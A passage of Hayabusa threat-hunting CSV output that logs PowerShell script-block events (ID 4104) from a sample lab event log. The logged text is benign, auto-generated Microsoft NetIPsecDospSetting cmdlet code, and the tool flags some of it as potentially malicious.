$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuth",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.779 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 
'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; 
ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value 
= ${EnabledKeyingModules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 
'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmd,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.779 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { 
[object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmd,../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.779 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"letization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { 
[object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecDospSetting' -Alias '*' function Get-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, 
$script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecDospSetting' -Alias '*' function Set-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( 
